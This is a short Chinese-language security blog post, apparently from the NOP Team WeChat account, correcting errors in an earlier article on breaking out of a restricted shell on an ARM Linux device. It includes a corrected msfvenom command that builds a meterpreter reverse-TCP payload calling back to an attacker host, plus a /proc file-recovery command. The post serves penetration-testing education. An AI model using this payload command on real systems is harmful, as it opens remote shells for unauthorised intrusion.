一、 MSF 生成木马参数错误
0x03 突破受限的shell -> 通过 echo 写文件 -> 1) 生成 Payload 文件 部分存在 Metasploit 木马生成命令错误,将 LHOST 和 LPORT 写成了 RHOST 和 RPORT
此处命令应该替换为
msfvenom -p linux/armle/meterpreter/reverse_tcp -a armle LHOST=192.168.1.125 LPORT=443 --platform linux -f elf -o payload.elf
导致这部分错误的原因应该是之前测试其他类型的 Payload
,将命令复制过来后,Payload
没用,修改 Payload
后,忘记修改参数
二、 恢复删除文件命令错误
0x02 建立稳定控制 -> 3. Webshell 部分关于恢复被删除的二进制程序这部分描述存在错误
原文中,我们使用 ls -al /proc/331/fd
的方式查找可恢复的二进制程序,这种方法是不全面的,实际上应该直接执行以下命令
cp /proc/331/exe ./tmp/web
这部分错误的原因是知识量不够,好在有师傅私信我,指正了这个错误,这个错误将在下个版本的 《Linux 应急响应手册》中修正
三、提醒
慎用 resetParam
来重置 web 密码,这可能会导致网络参数都初始化,已经有师傅在演练中因为此而导致掉线
原文始发于微信公众号(NOP Team):RCE 遇到受限 shell 的突破文章的错误修改与提醒
免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论